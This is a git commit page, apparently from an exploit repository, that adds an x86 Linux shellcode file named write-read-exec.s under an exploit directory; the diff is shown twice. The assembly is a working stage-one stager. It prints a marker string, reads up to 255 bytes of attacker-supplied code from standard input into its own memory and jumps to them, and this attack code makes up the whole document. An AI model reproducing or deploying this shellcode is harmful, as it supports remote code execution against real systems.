initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /exploits/7350wurm/shellcode/write-read-exec.s
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 38 insertions, 0 deletions
diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s
new file mode 100644
index 0000000..6f3956c
--- /dev/null
+++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
+wr_pos: xorl    %ebx, %ebx
+        incl    %ebx            /* ebx = 1 */
+        movl    $0x0b51740b, %eax
+        subl    $0x01010101, %eax
+        push    %eax
+        movl    %esp, %ecx      /* ecx = "AAA\n" */
+        push    $0x04
+        pop     %eax            /* eax = 4 */
+        movl    %eax, %edx
+        int     $0x80           /* write (1, "AAA\n", 4) */
+        jmp     ctramp
+rd_cde: xorl    %ebx, %ebx
+        mull    %ebx            /* ebx = eax = edx = 0 */
+        decb    %dl             /* edx = 0xff */
+        popl    %ecx            /* ecx = ncode */
+        push    $0x3
+        pop     %eax
+        int     $0x80           /* read (0, ncode, 0xff) */
+        jmp     ncode
+ctramp: call    rd_cde
+ncode:
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /exploits/7350wurm/shellcode/write-read-exec.s
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s new file mode 100644 index 0000000..6f3956c --- /dev/null +++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
	7	wr_pos: xorl %ebx, %ebx
	8	incl %ebx /* ebx = 1 */
	9
	10	movl $0x0b51740b, %eax
	11	subl $0x01010101, %eax
	12	push %eax
	13	movl %esp, %ecx /* ecx = "AAA\n" */
	14
	15	push $0x04
	16	pop %eax /* eax = 4 */
	17	movl %eax, %edx
	18
	19	int $0x80 /* write (1, "AAA\n", 4) */
	20
	21	jmp ctramp
	22	rd_cde: xorl %ebx, %ebx
	23	mull %ebx /* ebx = eax = edx = 0 */
	24
	25	decb %dl /* edx = 0xff */
	26	popl %ecx /* ecx = ncode */
	27
	28	push $0x3
	29	pop %eax
	30
	31	int $0x80 /* read (0, ncode, 0xff) */
	32	jmp ncode
	33
	34	ctramp: call rd_cde
	35	ncode:
	36
	37	cend:
	38